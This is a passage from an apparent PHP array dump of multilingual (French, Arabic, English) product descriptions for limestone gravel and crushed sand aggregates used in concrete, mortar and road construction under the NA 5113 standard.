<p style="text-align:left"><span style="color:#008000"><u><strong>Recommendations</strong></u><strong> :</strong></span></p>
<p style="text-align:left">The quality of the <span style="font-family:times new roman,times,serif"><strong><small><span style="font-size:16px">Gravel 8/15 mm</span></small></strong></span> supply is not only compliance with market requirements, but above all, the homogeneity of the characteristics checked. This regularity is one of the keys to the success of the <small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">construction site.</span></span></small></p>
<p style="text-align:left">For the client, all this involves setting usage specifications adapted to his own needs, using <span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">the</span></small><strong><small><span style="font-size:16px"> Gravel 8/15 mm</span></small></strong></span> that best meets his selection criteria, and carrying out all the necessary checks to verify that the <span style="font-family:times new roman,times,serif"><strong><small><span style="font-size:16px">Gravel 8/15 mm</span></small></strong></span><strong> </strong>is in line with his expectations and also has this much sought-after regularity.</p>
',
'img_prd' => 'produit-1611737181.png',
'img_prd_detail' => '',
'Code_Pr' => '125',
'prix_u' => '0',
'fiche_technique' => 'fiche_technique-1611737181.pdf',
'pos_slider' => '5'
),
'Environement' => array(),
'Pemploi' => array(),
'Securite' => array(),
'Specification' => array(),
'Stockage' => array(),
'typecomposition' => array(),
'Caracteristique' => array(),
'Controlequalite' => array()
),
(int) 1 => array(
'Produit' => array(
'id' => '485',
'nom_fr' => 'Gravier',
'nom_ara' => 'حصى',
'nom_en' => 'Gravel',
'sous_nom_fr' => '4/8 mm',
'sous_nom_ara' => '4/8 مم',
'sous_nom_en' => '4/8 mm',
'date_ajout' => '2021-01-27',
'image' => '',
'contenu_fr' => '<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <span style="color:#000000"><strong>Gravier 4/8 mm</strong></span> est un granulat d’origine minérale n’ayant subi aucune transformation autre que mécanique des roches massives est obtenu en exploitant des gisements de calcaire, en concassant du calcaire abattu y compris le concassage et le criblage et le broyage.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <span style="color:#000000"><strong>Gravier 4/8 mm</strong></span> est contrôlé selon le Référentiel <strong>NA 5113</strong>.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong><u>Utilisations</u> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <span style="color:#000000"><strong>Gravier 4/8 mm </strong></span>est<strong> </strong>utilisé lié avec du ciment ou du bitume.Il représente 80 à 90 % des mortiers et bétons hydrauliques destinés aux bâtiments et ouvrages d’art, mais aussi des enrobés et graves traitées destinés aux assises de chaussées et des voies ferroviaires.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <span style="color:#000000"><strong>Gravier 4/8 mm</strong></span><strong> </strong> entre dans les :</span></span></p>
<ul>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Travaux de Génie Civil</strong></span></span></span></p>
</li>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Enrobés</strong> <strong>Bitumineux</strong> (Construction des Chaussées)</span></span></span></p>
</li>
</ul>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong><u>Recommandations</u> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La qualité d’une fourniture du <span style="color:#000000"><strong>Gravier 4/8 mm</strong></span>, c’est non seulement le respect des exigences du marché, mais c’est avant tout l’homogénéité des caractéristiques contrôlées. Cette régularité constitue d’ailleurs l’une des clés de la réussite du chantier. </span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Pour le maître d’ouvrage, tout cela implique de fixer des spécifications d’usage adaptées à ses propres besoins, d’utiliser du <span style="color:#000000"><strong>Gravier 4/8 mm</strong></span> répondant au mieux à ses critères de choix, et d’effectuer tous les contrôles nécessaires pour vérifier que le <span style="color:#000000"><strong>Gravier 4/8 mm</strong></span> est conforme à son attente et a en plus cette régularité tant recherchée.</span></span></p>
',
'contenu_ara' => '<p dir="rtl" style="text-align: justify;"><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 4/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong> عبارة عن مجموع من أصل معدني لم يخضع لأي تحول بخلاف الصخور الميكانيكية الضخمة التي يتم الحصول عليها من خلال استغلال رواسب الحجر الجيري ، وسحق الحجر الجيري المتساقط بما في ذلك التكسير والغربلة والطحن. يتم التحكم في </span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 4/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong> وفقًا لمعيار<strong>NA 5113</strong>. </span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:20px"><strong><span style="color:#008000"><small><u> </u></small></span></strong></span><strong><span style="color:#008000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u>مجال الاستعمال</u></span></span></span></strong><span style="font-size:20px"><strong><span style="color:#008000"><small><span style="font-family:times new roman,times,serif">:</span></small></span></strong></span></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> يستخدم </span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 4/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong> مع الأسمنت أو القار ، ويمثل 80 إلى 90٪ من الملاط والخرسانة الهيدروليكية المخصصة للمباني وأعمال الهندسة المدنية ، وكذلك الأسفلت والحصى المعالجة المخصصة لأساسات الطرق والسكك الحديدية.</span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">- يتم تضمين</span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 4/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong> في:</span></span></p>
<ul dir="rtl">
<li style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <span style="color:#000000"> <strong> الأعمال المدنية</strong></span></span></span></li>
<li style="text-align: justify;"><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong> الخلائط البيتومينية (تشييد الطرق)</strong></span></span></span></li>
</ul>
<p dir="rtl" style="text-align: justify;"><strong><span style="color:#008000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u>التوصيات</u> :</span></span></span></strong></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">لا تقتصر جودة إمداد </span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 4/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم </strong>على الامتثال لمتطلبات السوق فحسب ، بل هي قبل كل شيء توافق الخصائص التي تم فحصها. هذا الاتساق هو ، علاوة على ذلك ، أحد مفاتيح نجاح موقع البناء</span></span>.</p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px">بالنسبة للزبون ، كل هذا يتضمن تحديد مواصفات استخدام تتكيف مع احتياجاته الخاصة ، واستخدام </span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 4/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong></span> الذي يلبي معايير الاختيار الخاصة به ، وإجراء جميع الفحوصات اللازمة للتحقق من أن </span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 4/8</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong></span> يتماشى مع توقعاته ولديه أيضًا هذا الانتظام المنشود فيه كثيرًا.</span></p>
',
'contenu_en' => '<p style="text-align:left"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px"><span style="color:#000000">The</span></span></small><strong><small><span style="font-size:16px"> Gravel 4/8 mm</span></small></strong><span style="color:#000000"><span style="font-size:16px"> is an aggregate of mineral origin that has not undergone any transformation other than mechanical massive rocks is obtained by exploiting limestone deposits, crushing downed limestone including crushing and screening and grinding.</span></span></span></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">The</span></small><strong><small><span style="font-size:16px"> Gravel 4/8 mm</span></small></strong></span> <span style="color:#000000">is controlled according to the <span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>NA 5113</strong></span> </span>Standard.</span></p>
<p style="text-align:left"><span style="color:#008000"><strong><u>Uses</u> :</strong></span></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><span style="font-size:16px">The<strong> Gravel 4/8 mm </strong>is<strong> </strong>used bound with cement or bitumen. It represents 80 to 90% of hydraulic mortars and concretes intended for buildings and civil engineering works, but also asphalt and treated gravels intended for the foundations of roadways and railways.</span></span></p>
<p style="text-align:left">The <span style="font-family:times new roman,times,serif"><strong><small><span style="font-size:16px">Gravel 4/8 mm</span></small></strong></span> is included in:</p>
<ul>
<li style="text-align:left">
<p> <span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong> Civil Engineering Work</strong></span></span></small></span><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> </span></span></small></span></p>
</li>
<li style="text-align:left">
<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> <strong>Bituminous Mixes (Road Construction)</strong></span></span></small></span></p>
</li>
</ul>
<p style="text-align:left"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><span style="color:#008000"><u><strong>Recommendations</strong></u><strong> :</strong></span></span></span></small></p>
<p style="text-align:left">The quality of the <span style="font-family:times new roman,times,serif"><strong><small><span style="font-size:16px">Gravel 4/8 mm</span></small></strong></span> supply is not only compliance with market requirements, but above all, the homogeneity of the characteristics checked. This regularity is one of the keys to the success of the <small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">construction site.</span></span></small></p>
<p style="text-align:left">For the client, all this involves setting usage specifications adapted to his own needs, using <span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">the</span></small><strong><small><span style="font-size:16px"> Gravel 4/8 mm</span></small></strong></span> that best meets his selection criteria, and carrying out all the necessary checks to verify that the <span style="font-family:times new roman,times,serif"><strong><small><span style="font-size:16px">Gravel 4/8 mm</span></small></strong></span><strong> </strong>is in line with his expectations and also has this much sought-after regularity.</p>
',
'img_prd' => 'produit-1611822434.png',
'img_prd_detail' => '',
'Code_Pr' => '485',
'prix_u' => '0',
'fiche_technique' => 'fiche_technique-1611737456.pdf',
'pos_slider' => '6'
),
'Environement' => array(),
'Pemploi' => array(),
'Securite' => array(),
'Specification' => array(),
'Stockage' => array(),
'typecomposition' => array(),
'Caracteristique' => array(),
'Controlequalite' => array()
),
(int) 2 => array(
'Produit' => array(
'id' => '489',
'nom_fr' => 'Gravier',
'nom_ara' => 'حصى',
'nom_en' => 'Gravel',
'sous_nom_fr' => '15/25 mm',
'sous_nom_ara' => ' 25/15 مم',
'sous_nom_en' => '15/25 mm',
'date_ajout' => '2021-01-27',
'image' => '',
'contenu_fr' => '<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Gravier</strong> <strong>15/25 mm</strong> est un granulat d’origine minérale n’ayant subi aucune transformation autre que mécanique des roches massives est obtenu en exploitant des gisements de calcaire, en concassant du calcaire abattu y compris le concassage et le criblage et le broyage.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Gravier</strong> <strong>15/25 mm</strong> est contrôlé selon le Référentiel <strong>NA 5113</strong>.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong><u>Utilisations</u> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Gravier</strong> <strong>15/25 mm </strong>est<strong> </strong>utilisé lié avec du ciment ou du bitume.Il représente 80 à 90 % des mortiers et bétons hydrauliques destinés aux bâtiments et ouvrages d’art, mais aussi des enrobés et graves traitées destinés aux assises de chaussées et des voies ferroviaires.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Gravier</strong> <strong>15/25 mm </strong> entre dans les :</span></span></p>
<ul>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Travaux de Génie Civil</strong></span></span></p>
</li>
<li>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Bétons Hydrauliques</strong> </span></span></p>
</li>
</ul>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong><u>Recommandations</u> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La qualité d’une fourniture du <strong>Gravier</strong> <strong>15/25 mm</strong>, c’est non seulement le respect des exigences du marché, mais c’est avant tout l’homogénéité des caractéristiques contrôlées. Cette régularité constitue d’ailleurs l’une des clés de la réussite du chantier. </span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Pour le maître d’ouvrage, tout cela implique de fixer des spécifications d’usage adaptées à ses propres besoins, d’utiliser du <strong>Gravier</strong> <strong>15/25 mm</strong> répondant au mieux à ses critères de choix, et d’effectuer tous les contrôles nécessaires pour vérifier que le <strong>Gravier</strong> <strong>15/25 mm</strong> est conforme à son attente et a en plus cette régularité tant recherchée.</span></span></p>
',
'contenu_ara' => '<p dir="rtl" style="text-align: justify;"><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 25/15</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong> عبارة عن مجموع من أصل معدني لم يخضع لأي تحول بخلاف الصخور الميكانيكية الضخمة التي يتم الحصول عليها من خلال استغلال رواسب الحجر الجيري ، وسحق الحجر الجيري المتساقط بما في ذلك التكسير والغربلة والطحن. يتم التحكم في </span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 25/15</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong> وفقًا لمعيار<strong>NA 5113</strong>. </span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="color:#008000"><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u>مجال الاستعمال</u></span></span></strong><span style="font-size:18px"><strong><small> :</small></strong></span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">- يستخدم </span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 25/15</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong> مع الأسمنت أو القار ، ويمثل 80 إلى 90٪ من الملاط والخرسانة الهيدروليكية المخصصة للمباني وأعمال الهندسة المدنية ، وكذلك الأسفلت والحصى المعالجة المخصصة لأساسات الطرق والسكك الحديدية.</span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">- يتم تضمين</span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 25/15</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong> في:</span></span></p>
<ul dir="rtl">
<li style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong> الأعمال المدنية</strong></span></span></li>
<li style="text-align: justify;"><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> الخرسانة الهيدروليكية</span></span></strong></span></span></strong></li>
</ul>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <u><span style="color:#008000"><strong> </strong></span></u></span></span><span style="color:#008000"><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u>التوصيات</u> :</span></span></strong></span></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">لا تقتصر جودة إمداد </span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 25/15</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم </strong>على الامتثال لمتطلبات السوق فحسب ، بل هي قبل كل شيء توافق الخصائص التي تم فحصها. هذا الاتساق هو ، علاوة على ذلك ، أحد مفاتيح نجاح موقع البناء</span></span>.</p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px">بالنسبة للزبون ، كل هذا يتضمن تحديد مواصفات استخدام تتكيف مع احتياجاته الخاصة ، واستخدام </span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 25/15</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong></span> الذي يلبي معايير الاختيار الخاصة به ، وإجراء جميع الفحوصات اللازمة للتحقق من أن </span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 25/15</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong></span> يتماشى مع توقعاته ولديه أيضًا هذا الانتظام المنشود فيه كثيرًا.</span></p>
',
'contenu_en' => '<p style="text-align:left"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px"><span style="color:#000000">The</span></span></small><strong><small><span style="font-size:16px"> Gravel 15/25 mm</span></small></strong><span style="color:#000000"><span style="font-size:16px"> is an aggregate of mineral origin that has not undergone any transformation other than mechanical massive rocks is obtained by exploiting limestone deposits, crushing downed limestone including crushing and screening and grinding.</span></span></span></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">The</span></small><strong><small><span style="font-size:16px"> Gravel 15/25 mm</span></small></strong></span> <span style="color:#000000">is controlled according to the <span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong>NA 5113</strong></span> </span>Standard.</span></p>
<p style="text-align:left"><span style="color:#008000"><strong><u>Uses</u> :</strong></span></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">The</span></small><strong><small><span style="font-size:16px"> Gravel 15/25 mm </span></small></strong><small><span style="font-size:16px">is u</span></small></span>sed bound with cement or bitumen. It represents 80 to 90% of hydraulic mortars and concretes intended for buildings and civil engineering works, but also asphalt and treated gravels intended for the foundations of roadways and railways.</p>
<p style="text-align:left">The <span style="font-family:times new roman,times,serif"><strong><small><span style="font-size:16px">Gravel 15/25 mm</span></small></strong></span> is included in:</p>
<ul>
<li style="text-align:left">
<p> <span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"><strong> Civil Engineering Work</strong></span></span></small></span></p>
</li>
</ul>
<ul>
<li style="text-align:left">
<p><span style="color:#000000"><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> <strong> Hydraulic Concrete</strong></span></span></small></span></p>
</li>
</ul>
<p style="text-align:left"><span style="color:#008000"><u><strong>Recommendations:</strong></u></span></p>
<p style="text-align:left">The quality of the <span style="font-family:times new roman,times,serif"><strong><small><span style="font-size:16px">Gravel 15/25 mm</span></small></strong></span> supply is not only compliance with market requirements, but above all, the homogeneity of the characteristics checked. This regularity is one of the keys to the success of the <small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">construction site.</span></span></small></p>
<p style="text-align:left">For the client, all this involves setting usage specifications adapted to his own needs, using <span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">the</span></small><strong><small><span style="font-size:16px"> Gravel 15/25 mm</span></small></strong></span> that best meets his selection criteria, and carrying out all the necessary checks to verify that the <span style="font-family:times new roman,times,serif"><strong><small><span style="font-size:16px">Gravel 15/25 mm</span></small></strong></span><strong> </strong>is in line with his expectations and also has this much sought-after regularity.</p>
',
'img_prd' => 'produit-1611736339.png',
'img_prd_detail' => '',
'Code_Pr' => '489',
'prix_u' => '0',
'fiche_technique' => 'fiche_technique-1611736339.pdf',
'pos_slider' => '4'
),
'Environement' => array(),
'Pemploi' => array(),
'Securite' => array(),
'Specification' => array(),
'Stockage' => array(),
'typecomposition' => array(),
'Caracteristique' => array(),
'Controlequalite' => array()
),
(int) 3 => array(
'Produit' => array(
'id' => '959',
'nom_fr' => 'Sable Concassé ',
'nom_ara' => 'حصى ',
'nom_en' => 'Gravel ',
'sous_nom_fr' => ' 0/4 mm',
'sous_nom_ara' => ' مم 0/4',
'sous_nom_en' => '0/4 mm',
'date_ajout' => '2021-01-27',
'image' => '',
'contenu_fr' => '<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Sable Concassé 0/4 mm</strong> est un granulat d’origine minérale n’ayant subi aucune transformation autre que mécanique des roches massives est obtenu en exploitant des gisements de calcaire, en concassant du calcaire abattu y compris le concassage et le criblage et le broyage.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Sable Concassé 0/4 mm </strong> est contrôlé selon le Référentiel <strong>NA 5113</strong>.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong><u>Utilisations</u> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <strong>Sable Concassé 0/4 mm </strong>est<strong> </strong>utilisé lié avec du ciment ou du bitume.Il représente 80 à 90 % des mortiers et bétons hydrauliques destinés aux bâtiments et ouvrages d’art, mais aussi des enrobés et graves traitées destinés aux assises de chaussées et des voies ferroviaires.</span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Le <span style="color:#000000"><strong>Sable Concassé 0/4 mm </strong></span><strong> </strong> entre dans les :</span></span></p>
<ul>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Travaux de Génie Civil</strong></span></span></span></p>
</li>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Mortiers</strong></span></span></span></p>
</li>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Bétons Hydrauliques</strong> </span></span></span></p>
</li>
<li>
<p><span style="color:#000000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>Enrobés</strong> <strong>Bitumineux</strong> (Construction des Chaussées)</span></span></span></p>
</li>
</ul>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><span style="color:#008000"><strong><u>Recommandations</u> :</strong></span></span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">La qualité d’une fourniture du <strong>Sable Concassé 0/4 mm </strong>, c’est non seulement le respect des exigences du marché, mais c’est avant tout l’homogénéité des caractéristiques contrôlées. Cette régularité constitue d’ailleurs l’une des clés de la réussite du chantier. </span></span></p>
<p><span style="font-size:16px"><span style="font-family:times new roman,times,serif">Pour le maître d’ouvrage, tout cela implique de fixer des spécifications d’usage adaptées à ses propres besoins, d’utiliser du <strong>Sable Concassé 0/4 mm</strong> répondant au mieux à ses critères de choix, et d’effectuer tous les contrôles nécessaires pour vérifier que le <strong>Sable Concassé 0/4 mm </strong> est conforme à son attente et a en plus cette régularité tant recherchée.</span></span></p>
',
'contenu_ara' => '<p dir="rtl" style="text-align: justify;"><span style="font-family:times new roman,times,serif"><span style="font-family:times new roman,times,serif"> </span><strong><span style="font-size:16px">حصى </span></strong></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>0/4 مم</strong> عبارة عن مجموع من أصل معدني لم يخضع لأي تحول بخلاف الصخور الميكانيكية الضخمة التي يتم الحصول عليها من خلال استغلال رواسب الحجر الجيري ، وسحق الحجر الجيري المتساقط بما في ذلك التكسير والغربلة والطحن. يتم التحكم في </span></span><span style="font-family:times new roman,times,serif"><span style="font-family:times new roman,times,serif"> </span><strong><span style="font-size:16px">حصى </span></strong></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>0/4 مم</strong> وفقًا لمعيار<strong>NA 5113</strong>. </span></span></p>
<p dir="rtl" style="text-align: justify;"><strong><span style="color:#008000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u>مجال الاستعمال</u></span></span></span></strong><span style="font-size:18px"><span style="color:#008000"><strong><small><span style="font-family:times new roman,times,serif">:</span></small></strong></span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">- يستخدم </span></span><span style="font-family:times new roman,times,serif"><span style="font-family:times new roman,times,serif"> </span><strong><span style="font-size:16px">حصى </span></strong></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>0/4 مم</strong> مع الأسمنت أو القار ، ويمثل 80 إلى 90٪ من الملاط والخرسانة الهيدروليكية المخصصة للمباني وأعمال الهندسة المدنية ، وكذلك الأسفلت والحصى المعالجة المخصصة لأساسات الطرق والسكك الحديدية.</span></span></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">- يتم تضمين</span></span><span style="font-family:times new roman,times,serif"><span style="font-family:times new roman,times,serif"> </span><strong><span style="font-size:16px">حصى </span></strong></span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>0/4 مم</strong> في:</span></span></p>
<ul dir="rtl">
<li style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong> الأعمال المدنية</strong></span></span></li>
<li style="text-align: justify;"><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> مدافع الهاون</span></span></strong></li>
<li style="text-align: justify;"><strong><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> الخرسانة الهيدروليكية</span></span></strong></li>
<li style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"> <strong> الخلائط البيتومينية (تشييد الطرق)</strong></span></span></li>
</ul>
<p dir="rtl" style="text-align: justify;"><strong><span style="color:#008000"><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><u>التوصيات</u> :</span></span></span></strong></p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px"><span style="font-family:times new roman,times,serif">لا تقتصر جودة إمداد </span></span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 0/4</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم </strong>على الامتثال لمتطلبات السوق فحسب ، بل هي قبل كل شيء توافق الخصائص التي تم فحصها. هذا الاتساق هو ، علاوة على ذلك ، أحد مفاتيح نجاح موقع البناء</span></span>.</p>
<p dir="rtl" style="text-align: justify;"><span style="font-size:16px">بالنسبة للزبون ، كل هذا يتضمن تحديد مواصفات استخدام تتكيف مع احتياجاته الخاصة ، واستخدام </span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 0/4</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong></span> الذي يلبي معايير الاختيار الخاصة به ، وإجراء جميع الفحوصات اللازمة للتحقق من أن </span><span style="font-family:times new roman,times,serif"><strong><span style="font-size:16px">حصى 0/4</span></strong> </span><span style="font-size:16px"><span style="font-family:times new roman,times,serif"><strong>مم</strong></span> يتماشى مع توقعاته ولديه أيضًا هذا الانتظام المنشود فيه كثيرًا.</span></p>
',
'contenu_en' => '<div class="tw-ta-container hide-focus-ring tw-nfl" id="tw-target-text-container">
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">The</span></small><strong><small><span style="font-size:16px"> Gravel 0/4 mm</span></small></strong><span style="color:#000000"><span style="font-size:16px"> is an aggregate of mineral origin that has not undergone any transformation other than mechanical massive rocks is obtained by exploiting limestone deposits, crushing downed limestone including crushing and screening and grinding.</span></span></span></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">The</span></small><strong><small><span style="font-size:16px"> Gravel 0/4 mm</span></small></strong></span> <span style="font-size:16px"><span style="font-family:times new roman,times,serif">is controlled according to the <strong>NA 5113</strong> Standard.</span></span></p>
<p style="text-align:left"><span style="color:#008000"><strong><u>Uses</u> :</strong></span></p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">The</span></small><strong><small><span style="font-size:16px"> Gravel 0/4 mm </span></small></strong><small><span style="font-size:16px">is u</span></small></span>sed bound with cement or bitumen. It represents 80 to 90% of hydraulic mortars and concretes intended for buildings and civil engineering works, but also asphalt and treated gravels intended for the foundations of roadways and railways.</p>
<p style="text-align:left"><span style="font-family:times new roman,times,serif"><small><span style="font-size:16px">The</span></small><strong><small><span style="font-size:16px"> Gravel 0/4 mm</span></small></strong></span> is included in:</p>
<ul>
<li style="text-align:left">
<p> <small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> <strong>Civil Engineering Work</strong></span></span></small></p>
</li>
<li style="text-align:left">
<p><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> <strong>Mortars</strong></span></span></small></p>
</li>
<li style="text-align:left">
<p><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> <strong>Hydraulic Concrete</strong></span></span></small></p>
</li>
<li style="text-align:left">
<p><small><span style="font-family:times new roman,times,serif"><span style="font-size:16px"> <strong>Bituminous Mixes (Road Construction)</strong></span></span></small></p>
</li>
</ul>
<p style="text-align:left"><span style="color:#008000"><strong><u>Recommendations</u> :</strong></span></p>
<p style="text-align:left">The quality of the <span style="font-family:times new roman,times,serif"><strong><small><span style="font-size:16px">Gravel 0/4 mm</span></small></strong></span> supply is not only compliance with market requirements, but above all, the homogeneity of the characteristics checked. This regularity is one of the keys to the success of the <small><span style="font-size:16px"><span style="font-family:times new roman,times,serif">construction site.</span></span></small></p>
